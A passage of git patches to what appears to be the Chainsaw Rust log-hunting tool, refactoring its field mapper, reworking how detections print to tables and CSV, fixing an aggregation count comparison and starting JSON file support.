HashMap::new(); for hid in hids { let hunt = hunts.get(hid).expect("could not get hunt"); - let fields = match &hunt.kind { - crate::hunt::HuntKind::Group { .. } => { - &groups.get(&hunt.id).expect("could not get group").fields - } - crate::hunt::HuntKind::Rule { .. } => { - &rules.get(&hunt.id).expect("could not get rule").fields - } - }; - let flds: HashMap<_, _> = - fields.iter().map(|f| (&f.name, &f.from)).collect(); + let flds: HashMap<_, _> = hunt + .mapper + .fields() + .iter() + .map(|f| (&f.name, &f.from)) + .collect(); for header in &headers { if let Some(from) = flds.get(header) { - let mapper = Mapper(&hunt.mapper, &wrapper); - if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + let mapped = hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) { hdrs.insert( header, @@ -278,7 +267,6 @@ pub fn print_detections( pub fn print_csv( detections: &[Detections], hunts: &[Hunt], - mappings: &[Mapping], rules: &HashMap>, local: bool, timezone: Option, @@ -296,20 +284,14 @@ pub fn print_csv( let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); - for header in &hunt.headers { - if !headers.1.contains(&header) { - (*headers).0.push(&header); - (*headers).1.insert(&header); + for field in hunt.mapper.fields() { + if field.visible && !headers.1.contains(&field.name) { + (*headers).0.push(&field.name); + (*headers).1.insert(&field.name); } } } // Build lookups - let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); - for mapping in mappings { - for group in &mapping.groups { - groups.insert(&group.id, group); - } - } let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Do a single unfold... @@ -401,20 +383,16 @@ pub fn print_csv( let mut hdrs = HashMap::new(); for hid in hids { let hunt = hunts.get(hid).expect("could not get hunt"); - let fields = match &hunt.kind { - crate::hunt::HuntKind::Group { .. } => { - &groups.get(&hunt.id).expect("could not get group").fields - } - crate::hunt::HuntKind::Rule { .. } => { - &rules.get(&hunt.id).expect("could not get rule").fields - } - }; - let flds: HashMap<_, _> = - fields.iter().map(|f| (&f.name, &f.from)).collect(); + let flds: HashMap<_, _> = hunt + .mapper + .fields() + .iter() + .map(|f| (&f.name, &f.from)) + .collect(); for header in &headers { if let Some(from) = flds.get(header) { - let mapper = Mapper(&hunt.mapper, &wrapper); - if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + let mapped = hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) { hdrs.insert(header, value); } diff --git a/src/hunt.rs b/src/hunt.rs index 6f323d3d..fb0d0a3d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -6,6 +6,8 @@ use std::path::{Path, PathBuf}; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; +// https://github.com/rust-lang/rust/issues/74465 +use once_cell::unsync::OnceCell; use serde::{Deserialize, Serialize}; use serde_json::Value as Json; use tau_engine::{ @@ -16,7 +18,7 @@ use uuid::Uuid; use crate::file::{Document as File, Kind as FileKind, Reader}; use crate::rule::{ - chainsaw::{Aggregate, Field, Filter, Rule as Chainsaw}, + chainsaw::{Aggregate, Container, Field, Filter, Format, Rule as Chainsaw}, Kind as RuleKind, Rule, }; @@ -93,18 +95,11 @@ impl HunterBuilder { let uuid = Uuid::new_v4(); let rules = map.entry(rule.kind.clone()).or_insert(vec![]); if &rule.kind == &RuleKind::Chainsaw { - let mapper = MapperKind::from(&rule.chainsaw.fields); + let mapper = Mapper::from(rule.chainsaw.fields.clone()); hunts.push(Hunt { id: uuid.clone(), group: rule.chainsaw.group.clone(), - headers: rule - .chainsaw - .fields - .iter() - .filter_map(|f| if f.visible { Some(&f.name) } else { None }) - .cloned() - .collect(), kind: HuntKind::Rule { aggregate: rule.chainsaw.aggregate.clone(), filter: rule.chainsaw.filter.clone(), @@ -122,45 +117,33 @@ impl HunterBuilder { } None => HashMap::new(), }; - let mappings = match self.mappings { - Some(mut mappings) => { - mappings.sort(); - let mut scratch = vec![]; - for mapping in mappings { - let mut file = fs::File::open(mapping)?; - let mut content = String::new(); - file.read_to_string(&mut content)?; - let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; - mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); - for group in &mapping.groups { - let mapper = MapperKind::from(&group.fields); - hunts.push(Hunt { - id: group.id.clone(), - - group: group.name.clone(), - headers: group - .fields - .iter() - .filter_map(|f| if f.visible { Some(&f.name) } else { None }) - .cloned() - .collect(), - kind: HuntKind::Group { - exclusions: mapping.exclusions.clone(), - filter: group.filter.clone(), - }, - timestamp: group.timestamp.clone(), + if let Some(mut mappings) = self.mappings { + mappings.sort(); + for mapping in mappings { + let mut file = fs::File::open(mapping)?; + let mut content = String::new(); + file.read_to_string(&mut content)?; + let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; + mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); + for group in mapping.groups { + let mapper = Mapper::from(group.fields); + hunts.push(Hunt { + id: group.id, + + group: group.name, + kind: HuntKind::Group { + exclusions: mapping.exclusions.clone(), + filter: group.filter, + }, + timestamp: group.timestamp, - file: mapping.kind.clone(), - mapper, - rule: mapping.rules.clone(), - }); - } - scratch.push(mapping); + file: mapping.kind.clone(), + mapper, + rule: mapping.rules.clone(), + }); } - scratch } - None => vec![], - }; + } let load_unknown = self.load_unknown.unwrap_or_default(); let local = self.local.unwrap_or_default(); @@ -169,7 +152,6 @@ impl HunterBuilder { Ok(Hunter { inner: HunterInner { hunts, - mappings, rules, from: self.from.map(|d| DateTime::from_utc(d, Utc)), @@ -237,14 +219,19 @@ pub enum HuntKind { pub enum MapperKind { None, Fast(HashMap), - Full(HashMap), + Full(HashMap)>), +} + +pub struct Mapper { + fields: Vec, + kind: MapperKind, } -impl MapperKind { - pub fn from(fields: &Vec) -> Self { +impl Mapper { + pub fn from(fields: Vec) -> Self { let mut fast = false; let mut full = false; - for field in fields { + for field in &fields { if field.container.is_some() { full = true; break; @@ -253,20 +240,95 @@ impl MapperKind { fast = true; } } - if full { + let kind = if full { let mut map = HashMap::with_capacity(fields.len()); - for field in fields { - map.insert(field.from.clone(), field.clone()); + for field in &fields { + map.insert( + field.from.clone(), + (field.to.clone(), field.container.clone()), + ); } MapperKind::Full(map) } else if fast { let mut map = HashMap::with_capacity(fields.len()); - for field in fields { + for field in &fields { map.insert(field.from.clone(), field.to.clone()); } MapperKind::Fast(map) } else { MapperKind::None + }; + Self { fields, kind } + } + + pub fn fields(&self) -> &Vec { + &self.fields + } + + pub fn mapped<'a, D>(&'a self, document: &'a D) -> Mapped<'a> + where + D: TauDocument, + { + Mapped { + cache: OnceCell::new(), + document, + mapper: self, + } + } +} + +pub struct Mapped<'a> { + cache: OnceCell>>, + document: &'a dyn TauDocument, + mapper: &'a Mapper, +} +impl<'a> TauDocument for Mapped<'a> { + fn find(&self, key: &str) -> Option> { + match &self.mapper.kind { + MapperKind::None => self.document.find(key), + MapperKind::Fast(map) => match map.get(key) { + Some(v) => self.document.find(v), + None => self.document.find(key), + }, + MapperKind::Full(map) => match map.get(key) { + Some((v, c)) => match c { + Some(container) => { + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + // Due to referencing and ownership, we parse all containers at once, which + // then allows us to use a OnceCell. + let mut lookup = HashMap::new(); + for field in &self.mapper.fields { + if let Some(container) = &field.container { + if !lookup.contains_key(&container.field) { + let data = match self.document.find(&container.field) { + Some(Tau::String(s)) => match container.format { + Format::Json => { + match serde_json::from_str::(&s) { + Ok(j) => Box::new(j) as Box, + Err(_) => continue, + } + } + }, + _ => continue, + }; + lookup.insert(container.field.clone(), data); + } + } + } + if let Err(_) = self.cache.set(lookup) { + panic!("cache is already set!"); + } + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + None + } + None => self.document.find(key), + }, + None => self.document.find(key), + }, } } } @@ -274,18 +336,16 @@ impl MapperKind { pub struct Hunt { pub id: Uuid, pub group: String, - pub headers: Vec, pub kind: HuntKind, + pub mapper: Mapper, pub timestamp: String, pub file: FileKind, - pub mapper: MapperKind, pub rule: RuleKind, } pub struct HunterInner { hunts: Vec, - mappings: Vec, rules: HashMap>, load_unknown: bool, @@ -296,22 +356,6 @@ pub struct HunterInner { to: Option>, } -//pub struct Mapper<'a>(&'a HashMap, &'a dyn TauDocument); -pub struct Mapper<'a>(pub &'a MapperKind, pub &'a dyn TauDocument); -impl<'a> TauDocument for Mapper<'a> { - fn find(&self, key: &str) -> Option> { - match &self.0 { - MapperKind::None => self.1.find(key), - MapperKind::Fast(map) => match map.get(key) { - Some(v) => self.1.find(v), - None => self.1.find(key), - }, - //MapperKind::Full(map) => unimplemented!(), - MapperKind::Full(map) => self.1.find(key), - } - } -} - pub struct Hunter { inner: HunterInner, } @@ -348,9 +392,9 @@ impl Hunter { continue; } - let mapper = Mapper(&hunt.mapper, &wrapper); + let mapped = hunt.mapper.mapped(&wrapper); - let timestamp = match mapper.find(&hunt.timestamp) { + let timestamp = match mapped.find(&hunt.timestamp) { Some(value) => match value.as_str() { Some(timestamp) => { match NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -386,17 +430,17 @@ impl Hunter { match &hunt.kind { HuntKind::Group { exclusions, filter } => { if let Some(rules) = self.inner.rules.get(&hunt.rule) { - if tau_engine::core::solve(&filter, &mapper) { + if tau_engine::core::solve(&filter, &mapped) { for (rid, rule) in rules { if exclusions.contains(&rule.name) { continue; } let hit = match &rule.filter { Filter::Detection(detection) => { - tau_engine::solve(&detection, &mapper) + tau_engine::solve(&detection, &mapped) } Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapper) + tau_engine::core::solve(&expression, &mapped) } }; if hit { @@ -412,9 +456,9 @@ impl Hunter { } HuntKind::Rule { aggregate, filter } => { let hit = match &filter { - Filter::Detection(detection) => tau_engine::solve(&detection, &mapper), + Filter::Detection(detection) => tau_engine::solve(&detection, &mapped), Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapper) + tau_engine::core::solve(&expression, &mapped) } }; if hit { @@ -423,7 +467,7 @@ impl Hunter { let mut hasher = DefaultHasher::new(); for field in &aggregate.fields { if let Some(value) = - mapper.find(&field).and_then(|s| s.to_string()) + mapped.find(&field).and_then(|s| s.to_string()) { value.hash(&mut hasher); } @@ -506,10 +550,6 @@ impl Hunter { &self.inner.hunts } - pub fn mappings(&self) -> &Vec { - &self.inner.mappings - } - pub fn rules(&self) -> &HashMap> { &self.inner.rules } diff --git a/src/main.rs b/src/main.rs index 2334972a..18fd7a96 100644 --- a/src/main.rs +++ b/src/main.rs @@ -292,21 +292,13 @@ fn run() -> Result<()> { } pb.finish(); if csv { - cli::print_csv( - &detections, - hunter.hunts(), - hunter.mappings(), - hunter.rules(), - local, - timezone, - )?; + cli::print_csv(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else if json { cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, hunter.hunts(), - hunter.mappings(), hunter.rules(), column_width.unwrap_or(40), full, diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index 37843cb8..a3adbf32 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -23,7 +23,7 @@ pub struct Aggregate { #[derive(Clone, Debug, Deserialize)] pub struct Container { - pub name: String, + pub field: String, pub format: Format, } From 1d48faa15833ca9ca032d05c148ae4710e936b39 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 12:41:43 +0100 Subject: [PATCH 10/77] refactor: clean up cli printing --- src/cli.rs | 381 ++++++++++++++++++++++++++++++++-------------------- src/hunt.rs | 9 ++ 2 files changed, 243 insertions(+), 147 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index b88a09e2..36cad43e 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,4 +1,4 @@ -use std::collections::{HashMap, HashSet}; +use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; @@ -6,6 +6,7 @@ use chrono_tz::Tz; use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; use prettytable::{cell, format, Row, Table}; use serde::Serialize; +use std::hash::{Hash, Hasher}; use tau_engine::Document; use uuid::Uuid; @@ -74,7 +75,16 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } -// FIXME: All the table stuff needs a little think due to the field complexities... +pub struct Grouping<'a> { + hits: Vec>, + kind: &'a Kind, + timestamp: &'a NaiveDateTime, +} + +pub struct Hit<'a> { + hunt: &'a Hunt, + rule: &'a Chainsaw, +} pub fn print_detections( detections: &[Detections], @@ -105,46 +115,60 @@ pub fn print_detections( .build(); // Build headers - let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + let mut headers: HashMap<&String, (Vec, HashSet)> = HashMap::new(); for hunt in hunts { let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); + // NOTE: We only support count in aggs atm so we can inject that value in...! + if hunt.is_aggregation() { + (*headers).0.push("count".to_owned()); + (*headers).1.insert("count".to_owned()); + } for field in hunt.mapper.fields() { if field.visible && !headers.1.contains(&field.name) { - (*headers).0.push(&field.name); - (*headers).1.insert(&field.name); + (*headers).0.push(field.name.clone()); + (*headers).1.insert(field.name.clone()); } } } + let mut headers: HashMap<_, _> = headers.into_iter().map(|(k, (v, _))| (k, v)).collect(); + // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); - // Do a single unfold... >> - let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = - HashMap::new(); + // Unpack detections + let mut groups: HashMap<&String, Vec> = HashMap::new(); for detection in detections { - let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); + let mut hits: HashMap<(&String, &NaiveDateTime), Vec> = HashMap::new(); for hit in &detection.hits { - let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; - let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); - (*tags).1.push((&hit.hunt, &hit.rule)); + let hunt = &hunts.get(&hit.hunt).expect("could not get hunt"); + let rule = &rules.get(&hit.rule).expect("could not get rule"); + let hits = hits.entry((&hunt.group, &hit.timestamp)).or_insert(vec![]); + (*hits).push(Hit { hunt, rule }); } - for (k, v) in tags { - let grouped = grouped.entry(k).or_insert(vec![]); - (*grouped).push((&v.0, &detection.kind, v.1)); + for ((group, timestamp), mut hits) in hits { + hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + let groups = groups.entry(group).or_insert(vec![]); + (*groups).push(Grouping { + kind: &detection.kind, + timestamp, + hits, + }); } } - let mut keys = grouped.keys().cloned().collect::>(); + let mut keys = groups.keys().cloned().collect::>(); keys.sort(); for key in keys { - let mut grouped = grouped.remove(&key).expect("could not get grouped!"); - grouped.sort_by(|x, y| x.0.cmp(&y.0)); + let mut group = groups.remove(&key).expect("could not get grouping!"); + group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + let mut table = Table::new(); table.set_format(format); - if let Some((headers, _)) = headers.remove(key) { + + if let Some(headers) = headers.remove(key) { let mut cells = vec![ cell!("timestamp").style_spec("c"), cell!("detections").style_spec("c"), @@ -157,108 +181,133 @@ pub fn print_detections( } } table.add_row(Row::new(cells)); - for (timestamp, kind, ids) in grouped { - // FIXME: Sort rules - //ids.sort(); + + for grouping in group { let localised = if let Some(timezone) = timezone { timezone - .from_local_datetime(timestamp) + .from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else if local { - Utc.from_local_datetime(timestamp) + Utc.from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() }; - let mut cells = vec![cell!(localised)]; - if metadata { - let mut table = Table::new(); - table.add_row(Row::new(vec![ - cell!("name").style_spec("c"), - cell!("authors").style_spec("c"), - cell!("level").style_spec("c"), - cell!("status").style_spec("c"), - ])); - for (_, rid) in &ids { - let rule = rules.get(rid).expect("could not get rule"); - table.add_row(Row::new(vec![ - cell!(rule.name), - cell!(rule.authors.join("\n")), - cell!(rule.level), - cell!(rule.status), - ])); + + // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some + // corners here! + let count; + let document = match grouping.kind { + Kind::Individual { document } => { + count = 1; + document } - cells.push(cell!(table)); - } else { - cells.push(cell!(ids - .iter() - .map(|(_, rid)| format!( - "{} {}", - RULE_PREFIX, - rules.get(rid).expect("could not get rule").name.as_str() - )) - .collect::>() - .join("\n"))); - } - let document = match kind { - Kind::Individual { document } => document, Kind::Aggregate { documents } => { + count = documents.len(); documents.first().expect("could not get document") } }; + + let mut rows = vec![]; + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); - cells.push(cell!(format_field_length(&json, false, column_width))); + let rules = grouping.hits.iter().map(|hit| hit.rule).collect(); + rows.push(( + 0, + vec![cell!(format_field_length(&json, false, column_width))], + )); + seen.insert(0, rules); } else { - // This is really complicated, we could land in the same group but be from - // different hunts that have different headers, that also could even overlap... - // Because we group we won't be able to reliably handle clashes. - let mut hids = HashSet::new(); - for (hid, _) in &ids { - hids.insert(hid); - } let wrapper = match &document.kind { FileKind::Evtx => crate::evtx::Wrapper(&document.data), - _ => continue, + FileKind::Unknown => continue, }; - let mut hdrs = HashMap::new(); - for hid in hids { - let hunt = hunts.get(hid).expect("could not get hunt"); - let flds: HashMap<_, _> = hunt + // What we do here is hash each row since if the fields are the same but the values + // are not then we would lose data, so in this case we split the row + for hit in &grouping.hits { + let fields: HashMap<_, _> = hit + .hunt .mapper .fields() .iter() - .map(|f| (&f.name, &f.from)) + .map(|f| (&f.name, f)) .collect(); + let mut cells = vec![]; + let mut hasher = DefaultHasher::new(); for header in &headers { - if let Some(from) = flds.get(header) { - let mapped = hunt.mapper.mapped(&wrapper); - if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) - { - hdrs.insert( - header, - format_field_length(&value, full, column_width), - ); + if let Some(field) = fields.get(header) { + let mapped = hit.hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&field.from) { + match value.to_string() { + Some(v) => { + v.hash(&mut hasher); + cells.push(cell!(format_field_length( + &v, + full, + column_width + ))); + } + None => { + "".hash(&mut hasher); + cells.push(cell!("")); + } + } + continue; } + } else if header == "count" { + cells.push(cell!(count)); + continue; } + cells.push(cell!("")); } + let id = hasher.finish(); + if !seen.contains_key(&id) { + rows.push((id, cells)); + } + let rules = seen.entry(id).or_insert(vec![]); + (*rules).push(hit.rule); } - for header in &headers { - if let Some(value) = hdrs.get(header) { - cells.push(cell!(value)); - } else { - cells.push(cell!("")); + } + + for (id, row) in rows { + let rules = seen.remove(&id).expect("could not get rules"); + let mut cells = vec![cell!(localised)]; + if metadata { + let mut table = Table::new(); + table.add_row(Row::new(vec![ + cell!("name").style_spec("c"), + cell!("authors").style_spec("c"), + cell!("level").style_spec("c"), + cell!("status").style_spec("c"), + ])); + for rule in &rules { + table.add_row(Row::new(vec![ + cell!(rule.name), + cell!(rule.authors.join("\n")), + cell!(rule.level), + cell!(rule.status), + ])); } + cells.push(cell!(table)); + } else { + cells.push(cell!(rules + .iter() + .map(|rule| format!("{} {}", RULE_PREFIX, rule.name)) + .collect::>() + .join("\n"))); } + cells.extend(row); + table.add_row(Row::new(cells)); } - table.add_row(Row::new(cells)); } } + cs_greenln!("\n[+] Group: {}", key); cs_print_table!(table); } @@ -278,48 +327,65 @@ pub fn print_csv( .expect("could not get output directory") }; fs::create_dir_all(directory)?; + // Build headers - let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + let mut headers: HashMap<&String, (Vec, HashSet)> = HashMap::new(); for hunt in hunts { let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); + // NOTE: We only support count in aggs atm so we can inject that value in...! + if hunt.is_aggregation() { + (*headers).0.push("count".to_owned()); + (*headers).1.insert("count".to_owned()); + } for field in hunt.mapper.fields() { if field.visible && !headers.1.contains(&field.name) { - (*headers).0.push(&field.name); - (*headers).1.insert(&field.name); + (*headers).0.push(field.name.clone()); + (*headers).1.insert(field.name.clone()); } } } + let mut headers: HashMap<_, _> = headers.into_iter().map(|(k, (v, _))| (k, v)).collect(); + // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); - // Do a single unfold... - let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = - HashMap::new(); + + // Unpack detections + let mut groups: HashMap<&String, Vec> = HashMap::new(); for detection in detections { - let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); + let mut hits: HashMap<(&String, &NaiveDateTime), Vec> = HashMap::new(); for hit in &detection.hits { - let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; - let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); - (*tags).1.push((&hit.hunt, &hit.rule)); + let hunt = &hunts.get(&hit.hunt).expect("could not get hunt"); + let rule = &rules.get(&hit.rule).expect("could not get rule"); + let hits = hits.entry((&hunt.group, &hit.timestamp)).or_insert(vec![]); + (*hits).push(Hit { hunt, rule }); } - for (k, v) in tags { - let grouped = grouped.entry(k).or_insert(vec![]); - (*grouped).push((&v.0, &detection.kind, v.1)); + for ((group, timestamp), mut hits) in hits { + hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + let groups = groups.entry(group).or_insert(vec![]); + (*groups).push(Grouping { + kind: &detection.kind, + timestamp, + hits, + }); } } - let mut keys = grouped.keys().cloned().collect::>(); + + let mut keys = groups.keys().cloned().collect::>(); keys.sort(); for key in keys { - let mut grouped = grouped.remove(&key).expect("could not get grouped!"); - grouped.sort_by(|x, y| x.0.cmp(&y.0)); + let mut group = groups.remove(&key).expect("could not get grouping!"); + group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + // FIXME: Handle name clashes let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase()); let path = directory.join(&filename); let mut csv = prettytable::csv::Writer::from_path(path)?; cs_eprintln!("[+] Created {}", filename); - if let Some((headers, _)) = headers.remove(key) { + + if let Some(headers) = headers.remove(key) { let mut cells = vec!["timestamp", "detections"]; if headers.is_empty() { cells.push("data"); @@ -329,85 +395,106 @@ pub fn print_csv( } } csv.write_record(cells)?; - for (timestamp, kind, ids) in grouped { - // FIXME: Sort tags - //tags.sort(); + + for grouping in group { let localised = if let Some(timezone) = timezone { timezone - .from_local_datetime(timestamp) + .from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else if local { - Utc.from_local_datetime(timestamp) + Utc.from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() }; - let mut cells = vec![localised]; - cells.push( - ids.iter() - .map(|(_, rid)| { - format!( - "{}", - rules.get(rid).expect("could not get rule").name.as_str() - ) - }) - .collect::>() - .join(";"), - ); - let document = match kind { - Kind::Individual { document } => document, + + // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some + // corners here! + let count; + let document = match grouping.kind { + Kind::Individual { document } => { + count = 1; + document + } Kind::Aggregate { documents } => { + count = documents.len(); documents.first().expect("could not get document") } }; + + let mut rows = vec![]; + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); - cells.push(json); + let rules = grouping.hits.iter().map(|hit| hit.rule).collect(); + rows.push((0, vec![json])); + seen.insert(0, rules); } else { - // This is really complicated, we could land in the same group but be from - // different hunts that have different headers, that also could even overlap... - // Because we group we won't be able to reliably handle clashes. - let mut hids = HashSet::new(); - for (hid, _) in &ids { - hids.insert(hid); - } let wrapper = match &document.kind { FileKind::Evtx => crate::evtx::Wrapper(&document.data), - _ => continue, + FileKind::Unknown => continue, }; - let mut hdrs = HashMap::new(); - for hid in hids { - let hunt = hunts.get(hid).expect("could not get hunt"); - let flds: HashMap<_, _> = hunt + // What we do here is hash each row since if the fields are the same but the values + // are not then we would lose data, so in this case we split the row + for hit in &grouping.hits { + let fields: HashMap<_, _> = hit + .hunt .mapper .fields() .iter() - .map(|f| (&f.name, &f.from)) + .map(|f| (&f.name, f)) .collect(); + let mut cells = vec![]; + let mut hasher = DefaultHasher::new(); for header in &headers { - if let Some(from) = flds.get(header) { - let mapped = hunt.mapper.mapped(&wrapper); - if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) - { - hdrs.insert(header, value); + if let Some(field) = fields.get(header) { + let mapped = hit.hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&field.from) { + match value.to_string() { + Some(v) => { + v.hash(&mut hasher); + cells.push(v); + } + None => { + "".hash(&mut hasher); + cells.push("".to_owned()); + } + } + continue; } + } else if header == "count" { + cells.push(count.to_string()); + continue; } - } - } - for header in &headers { - if let Some(value) = hdrs.get(header) { - cells.push(value.to_string()); - } else { cells.push("".to_owned()); } + let id = hasher.finish(); + if !seen.contains_key(&id) { + rows.push((id, cells)); + } + let rules = seen.entry(id).or_insert(vec![]); + (*rules).push(hit.rule); } } - csv.write_record(cells)?; + + for (id, row) in rows { + let rules = seen.remove(&id).expect("could not get rules"); + let mut cells = vec![localised.clone()]; + cells.push( + rules + .iter() + .map(|rule| format!("{}", rule.name)) + .collect::>() + .join(";"), + ); + cells.extend(row); + csv.write_record(cells)?; + } } } } diff --git a/src/hunt.rs b/src/hunt.rs index fb0d0a3d..e081de6c 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -344,6 +344,15 @@ pub struct Hunt { pub rule: RuleKind, } +impl Hunt { + pub fn is_aggregation(&self) -> bool { + if let HuntKind::Rule { aggregate, .. } = &self.kind { + return aggregate.is_some(); + } + false + } +} + pub struct HunterInner { hunts: Vec, rules: HashMap>, From 1386c24e3f6499232c6ab4905af3a7260ac28bf3 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 12:54:21 +0100 Subject: [PATCH 11/77] fix: aggregation count logic was incorrect --- Cargo.lock | 11 +++++------ src/hunt.rs | 10 +++++----- 2 files changed, 10 insertions(+), 11 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 0616c4fe..7bc20f9b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -537,7 +537,7 @@ checksum = "9be70c98951c83b8d2f8f60d7065fa6d5146873094452a1008da8c2f1e4205ad" dependencies = [ "cfg-if", "libc", - "wasi 0.10.0+wasi-snapshot-preview1", + "wasi 0.10.2+wasi-snapshot-preview1", ] [[package]] @@ -1272,12 +1272,11 @@ dependencies = [ [[package]] name = "time" -version = "0.1.44" +version = "0.1.43" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" +checksum = "ca8a50ef2360fbd1eeb0ecd46795a87a19024eb4b53c5dc916ca1fd95fe62438" dependencies = [ "libc", - "wasi 0.10.0+wasi-snapshot-preview1", "winapi", ] @@ -1393,9 +1392,9 @@ checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" -version = "0.10.0+wasi-snapshot-preview1" +version = "0.10.2+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" +checksum = "fd6fbd9a79829dd1ad0cc20627bf1ed606756a7f77edff7b66b7064f9cb327c6" [[package]] name = "winapi" diff --git a/src/hunt.rs b/src/hunt.rs index e081de6c..7e9c880d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -516,11 +516,11 @@ impl Hunter { for (id, (aggregate, docs)) in aggregates { for ids in docs.values() { let hit = match aggregate.count { - Pattern::Equal(i) => (i as usize) == ids.len(), - Pattern::GreaterThan(i) => (i as usize) > ids.len(), - Pattern::GreaterThanOrEqual(i) => (i as usize) >= ids.len(), - Pattern::LessThan(i) => (i as usize) < ids.len(), - Pattern::LessThanOrEqual(i) => (i as usize) <= ids.len(), + Pattern::Equal(i) => ids.len() == (i as usize), + Pattern::GreaterThan(i) => ids.len() > (i as usize), + Pattern::GreaterThanOrEqual(i) => ids.len() >= (i as usize), + Pattern::LessThan(i) => ids.len() < (i as usize), + Pattern::LessThanOrEqual(i) => ids.len() <= (i as usize), _ => false, }; if hit { From b975b06b75d41b23559071710e598ec7a8089aa1 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 13:53:00 +0100 Subject: [PATCH 12/77] feat: add in basic json file support --- src/cli.rs | 29 +++++++++++------ src/file/json.rs | 46 ++++++++++++++++++++++++++ src/file/mod.rs | 18 +++++++++- src/hunt.rs | 16 ++++++--- src/search.rs | 85 ++++++++++++++++++++++++++++-------------------- 5 files changed, 143 insertions(+), 51 deletions(-) create mode 100644 src/file/json.rs diff --git a/src/cli.rs b/src/cli.rs index 36cad43e..e8178ea2 